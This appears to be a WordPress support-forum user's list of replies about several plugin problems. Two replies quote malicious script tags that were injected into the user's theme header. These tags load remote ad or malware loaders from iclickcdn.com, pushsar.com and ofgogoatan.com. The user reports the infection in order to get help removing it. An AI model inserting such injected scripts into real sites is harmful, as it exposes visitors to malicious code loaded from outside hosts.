neocraft
Forum Replies Created
-
Hello,
Thanks for your reactivity.I’ve test and look like admin don’t received ‘password change’ mail…this is ok.
But when a user register he still received a mail like this :
[MyWebsite] Login Details
Username: UserTest3 To set your password, visit the following address: https://mywebsite.com/signin/?action=rp&key=PASSWORD_IN_CLEAR&login=UserTest3 https://mywebsite.com/signin/ If you have already set your own password, you may disregard this email and use the password you have already set.
I don’t want this because user already setup is password (moreover password is not crypted in mail).
Do you know what is the issue ?
- This reply was modified 3 years, 8 months ago by neocraft.
Hello,
Same problem here, still receiving all wordpress default emails (login credentials, change password…)
The only plugin that @databell96 has installed and i have too is YOAST SEO…Did you find a fix ?
Thanks help.
- This reply was modified 3 years, 8 months ago by neocraft.
Forum: Plugins
In reply to: [SSL Certificate - Free SSL, HTTPS by SSL Zen] Step 3 failed and chrome errorYes, so why i can’t still pass step3 in your plugin ?
Today no detection by “Anti-Malware from GOTMLS.NET” and securi, but still new code on header :
<meta name=”propeller” content=”0d1ba639c78d2bf91cbfe52d30bdfff2″>
<script>(function(s,u,z,p){s.src=u,s.setAttribute(‘data-zone’,z),p.appendChild(s);})(document.createElement(‘script’),’https://iclickcdn.com/tag.min.js’,3305137,document.body||document.documentElement)</script>I can’t find any file name monit.php
I can’t access this url “my_domain/wp-admin/options-general.php?page=monit” this page display message : “Sorry, you are not allowed to access this page.”
Hello,
I’ve same issue here with this code :<meta name=”propeller” content=”0d1ba639c78d2bf91cbfe52d30bdfff2″>
<script src=”https://pushsar.com/pfe/current/tag.min.js?z=3305143″ data-cfasync=”false” async></script>
<script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3305137″ async data-cfasync=”false”></script>Each day i found it write on theme/header.php….
Sometimes find a code on my functions.php file…I’ve change host credentials, wordpress admin credentials…
I really start mad with this f*** malware !!
How can i check in database if code was write somewhere ?Really need a solution.
Please help.PS: code from propeller ads network, i’ve contact them and they don’t do anything to block hacker account…
Forum: Plugins
In reply to: [WooCommerce] Product permalinks sructure settings don’t saveForum: Plugins
In reply to: [WooCommerce] Product permalinks sructure settings don’t saveHello,
Thanks answer, but i’ve already try this : disable all plugins, setting twenty twenty theme, clean cache…etc…etc…
And as you can see in my post with a local CLEAN install WITHOUT any plugin and WITHOUT themes, i have the same issue !!finally found solution :
// ACCOUNT TAB 1
add_filter(‘um_account_page_default_tabs_hook’, ‘my_custom_tab_in_um’, 100 );
function my_custom_tab_in_um( $tabs ) {
$tabs[800][‘tab1’][‘icon’] = ‘um-faicon-arrow-circle-o-down’;
$tabs[800][‘tab1’][‘title’] = ‘Tab 1’;
$tabs[800][‘tab1’][‘custom’] = true;
return $tabs;
}add_action(‘um_account_tab__tab1’, ‘um_account_tab__tab1’);
function um_account_tab__tab1( $info ) {
global $ultimatemember;
extract( $info );$output = $ultimatemember->account->get_tab_output(‘tab1’);
if ( $output ) { echo $output; }
}add_filter(‘um_account_content_hook_tab1’, ‘um_account_content_hook_tab1’);
function um_account_content_hook_tab1( $output ){
ob_start();
?><div class=”um-field”>
page or shortcode or content here.
</div>
<?php
$output .= ob_get_contents();
ob_end_clean();
return $output;
}// ACCOUNT TAB 2
add_filter(‘um_account_page_default_tabs_hook’, ‘my_custom_tab_in_um2’, 100 );
function my_custom_tab_in_um2( $tabs ) {
$tabs[800][‘tab2’][‘icon’] = ‘um-faicon-pencil’;
$tabs[800][‘tab2’][‘title’] = ‘Tab2’;
$tabs[800][‘tab2’][‘custom’] = true;
return $tabs;
}add_action(‘um_account_tab__tab2’, ‘um_account_tab__tab2’);
function um_account_tab__tab2( $info ) {
global $ultimatemember;
extract( $info );$output = $ultimatemember->account->get_tab_output(‘Tab 2’);
if ( $output ) { echo $output; }
}add_filter(‘um_account_content_hook_tab2’, ‘um_account_content_hook_tab2’);
function um_account_content_hook_tab2( $output ){
ob_start();
?><div class=”um-field”>
page or shortcode or content here.
</div>
<?php
$output .= ob_get_contents();
ob_end_clean();
return $output;
}Forum: Plugins
In reply to: [Wise Chat] Image don’t appearHello,
@marcinlawrowski => confirmation that this update fixed bug !
(need to clear cache on cloudflare too, if use it)
Thanks reactivity and for your work !
Forum: Plugins
In reply to: [Wise Chat] Image don’t appearAny news about this errors ?
Forum: Plugins
In reply to: [Wise Chat] Image don’t appear[onMessageSentError]
Fatal error: Uncaught Error: Call to undefined function filter_block_content() in ****/public_html/wp-includes/formatting.php:4924
Stack trace: #0 ****/public_html/wp-includes/class-wp-hook.php(288): wp_pre_kses_block_attributes(‘0’, ‘post’, Array)
#1 ****/public_html/wp-includes/plugin.php(206): WP_Hook->apply_filters(‘0’, Array)
#2 ****/public_html/wp-includes/kses.php(914): apply_filters(‘pre_kses’, ‘0’, ‘post’, Array)
#3 ****/public_html/wp-includes/kses.php(737): wp_kses_hook(‘0’, ‘post’, Array)
#4 ****/public_html/wp-includes/kses.php(1941): wp_kses(‘0’, ‘post’)
#5 ****/public_html/wp-includes/formatting.php(4848): wp_kses_post(0)
#6 ****/public_html/wp-includes/formatting.php(4840): map_deep(0, ‘wp_kses_post’)
#7 ****/publi in ****/public_html/wp-includes/formatting.php on line 4924
There has been a critical error on your website.Forum: Plugins
In reply to: [Wise Chat] Image don’t appearAnd when using an image url i’ve this error :
“Failed to load resource: the server responded with a status of 500 ()”
“../wp-content/plugins/wise-chat/src/endpoints/?action=wise_chat_message_endpoint – error 500”Forum: Plugins
In reply to: [Two Factor Authentication] Problem save settings FrontendThanks for fast support…
I’ve just find how to fixed this bug.
Bootstrap use the ‘slim’ version of jquery that not include Ajax function.
so just need to replace bootsrap jquery with this one :
<script src=”https://code.jquery.com/jquery-3.3.1.min.js” integrity=”sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=” crossorigin=”anonymous”></script>
Have good day.
Forum: Plugins
In reply to: [Two Factor Authentication] Problem save settings FrontendHello,
Thanks answer.
I don’t want custom development job, just need to find why my bootstrap nav-tab don’t work with your plugin in frontend :'(If i need to downgrade bootsrap it’s not a problem, but which version compatible?